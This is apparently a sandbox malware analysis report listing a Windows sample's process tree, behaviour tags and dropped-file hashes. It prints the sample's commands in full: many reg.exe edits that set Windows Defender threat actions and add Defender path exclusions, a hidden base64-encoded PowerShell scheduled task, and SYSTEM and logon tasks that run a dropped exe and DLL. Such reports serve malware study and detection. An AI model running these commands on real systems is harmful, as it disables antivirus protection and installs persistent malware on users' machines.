                                                        • Adds Run key to start application
                                                        • Checks for VirtualBox DLLs, possible anti-VM trick
                                                        • Drops file in Windows directory
                                                        • Modifies data under HKEY_USERS
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:5412
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                          PID:1408
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                          3⤵
                                                            PID:5932
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                            3⤵
                                                              PID:5948
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                                PID:6104
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                  PID:2080
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                  3⤵
                                                                    PID:2084
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                    3⤵
                                                                      PID:5140
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                      3⤵
                                                                        PID:2988
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                        3⤵
                                                                          PID:3460
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                          3⤵
                                                                            PID:4112
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                              PID:1248
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                                PID:5688
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                3⤵
                                                                                  PID:5988
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                  3⤵
                                                                                    PID:1584
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                    3⤵
                                                                                      PID:3448
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                      3⤵
                                                                                        PID:2408
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                        3⤵
                                                                                          PID:4560
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                          3⤵
                                                                                            PID:5664
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                            3⤵
                                                                                              PID:5436
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                              3⤵
                                                                                                PID:5900
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                3⤵
                                                                                                  PID:4352
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                  3⤵
                                                                                                    PID:2672
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                    3⤵
                                                                                                      PID:5432
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                      3⤵
                                                                                                        PID:3576
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                        3⤵
                                                                                                          PID:1284
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AsRtOTETCNfDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AsRtOTETCNfDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BCDBNUauOckU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BCDBNUauOckU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VjBUDnCPU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VjBUDnCPU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qFmzepOeHSjDLjQlSgR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qFmzepOeHSjDLjQlSgR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qdWBYcETnEUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qdWBYcETnEUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WhKQivtBOjWPJtVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WhKQivtBOjWPJtVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\osszcinDeFgrFwAQ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\osszcinDeFgrFwAQ\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                        2⤵
                                                                                                        • Drops file in System32 directory
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:5864
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AsRtOTETCNfDC" /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                            PID:6084
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AsRtOTETCNfDC" /t REG_DWORD /d 0 /reg:32
                                                                                                              4⤵
                                                                                                                PID:3568
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AsRtOTETCNfDC" /t REG_DWORD /d 0 /reg:64
                                                                                                              3⤵
                                                                                                                PID:2300
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BCDBNUauOckU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                3⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:3768
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BCDBNUauOckU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                3⤵
                                                                                                                  PID:4768
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VjBUDnCPU" /t REG_DWORD /d 0 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:4208
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VjBUDnCPU" /t REG_DWORD /d 0 /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:5600
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qFmzepOeHSjDLjQlSgR" /t REG_DWORD /d 0 /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:424
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qFmzepOeHSjDLjQlSgR" /t REG_DWORD /d 0 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:5148
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qdWBYcETnEUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:3616
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qdWBYcETnEUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:3440
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WhKQivtBOjWPJtVB /t REG_DWORD /d 0 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:2892
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WhKQivtBOjWPJtVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:1152
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:2684
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:2508
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:1244
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:4724
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB /t REG_DWORD /d 0 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:2528
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB /t REG_DWORD /d 0 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:5980
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\osszcinDeFgrFwAQ /t REG_DWORD /d 0 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:4764
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\osszcinDeFgrFwAQ /t REG_DWORD /d 0 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:4780
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /CREATE /TN "gxjAFPRFo" /SC once /ST 06:27:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                2⤵
                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                PID:1592
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /run /I /tn "gxjAFPRFo"
                                                                                                                                                2⤵
                                                                                                                                                  PID:2784
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /DELETE /F /TN "gxjAFPRFo"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5784
                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5432
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /CREATE /TN "aKUtYNqNUJyRiHHcg" /SC once /ST 10:25:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\osszcinDeFgrFwAQ\ZDkhhVePCqlviCa\iEuELDL.exe\" ts /JEsite_idGzN 385118 /S" /V1 /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:5296
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /run /I /tn "aKUtYNqNUJyRiHHcg"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:4052
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                      1⤵
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:4980
                                                                                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                        2⤵
                                                                                                                                                          PID:5932
                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5140
                                                                                                                                                        • C:\Windows\Temp\osszcinDeFgrFwAQ\ZDkhhVePCqlviCa\iEuELDL.exe
                                                                                                                                                          C:\Windows\Temp\osszcinDeFgrFwAQ\ZDkhhVePCqlviCa\iEuELDL.exe ts /JEsite_idGzN 385118 /S
                                                                                                                                                          1⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Drops desktop.ini file(s)
                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:2720
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /DELETE /F /TN "bLyGxHYCYhmZEhkSec"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:5960
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4756
                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4768
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:6052
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1040
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4328
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\VjBUDnCPU\ShjUqL.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VeNWzXAjHYHBoCZ" /V1 /F
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                        PID:4940

                                                                                                                                                                    Network

                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                    Replay Monitor

                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                    Downloads

                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                      Filesize

                                                                                                                                                                      1.2MB

                                                                                                                                                                      MD5

                                                                                                                                                                      6608de2b1410289e939242a553e7e0fa

                                                                                                                                                                      SHA1

                                                                                                                                                                      5a81a46927ab805c5e5bb039e91b33c756188e03

                                                                                                                                                                      SHA256

                                                                                                                                                                      6280d3f92ec0245a35a158f65c3d1b11484151838fb576a9ad0538f24c970334

                                                                                                                                                                      SHA512

                                                                                                                                                                      a084dd3f12deefa160290b6300b6de9315b72c38449875a6ca0b4f6ebfed7f10b037f59b69d6138b5b40cb1f0938d648950656689c8ca3b5b58f4844cdae070f

                                                                                                                                                                    • C:\ProgramData\Are.docx

                                                                                                                                                                      Filesize

                                                                                                                                                                      11KB

                                                                                                                                                                      MD5

                                                                                                                                                                      a33e5b189842c5867f46566bdbf7a095

                                                                                                                                                                      SHA1

                                                                                                                                                                      e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                                                                                                      SHA256

                                                                                                                                                                      5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                                                                                                      SHA512

                                                                                                                                                                      f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                                                                                                    • C:\ProgramData\mozglue.dll

                                                                                                                                                                      Filesize

                                                                                                                                                                      593KB

                                                                                                                                                                      MD5

                                                                                                                                                                      c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                      SHA1

                                                                                                                                                                      95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                      SHA256

                                                                                                                                                                      ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                      SHA512

                                                                                                                                                                      fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                    • C:\ProgramData\nss3.dll

                                                                                                                                                                      Filesize

                                                                                                                                                                      2.0MB

                                                                                                                                                                      MD5

                                                                                                                                                                      1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                                      SHA1

                                                                                                                                                                      6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                                      SHA256

                                                                                                                                                                      ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                                      SHA512

                                                                                                                                                                      dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                                      Filesize

                                                                                                                                                                      2KB

                                                                                                                                                                      MD5

                                                                                                                                                                      6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                                                      SHA1

                                                                                                                                                                      24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                                                      SHA256

                                                                                                                                                                      b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                                                      SHA512

                                                                                                                                                                      0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                      Filesize

                                                                                                                                                                      2KB

                                                                                                                                                                      MD5

                                                                                                                                                                      a6ea7bfcd3aac150c0caef765cb52281

                                                                                                                                                                      SHA1

                                                                                                                                                                      037dc22c46a0eb0b9ad4c74088129e387cffe96b

                                                                                                                                                                      SHA256

                                                                                                                                                                      f019af2e5e74cdf13c963910500f9436c66b6f2901f5056d72f82310f20113b9

                                                                                                                                                                      SHA512

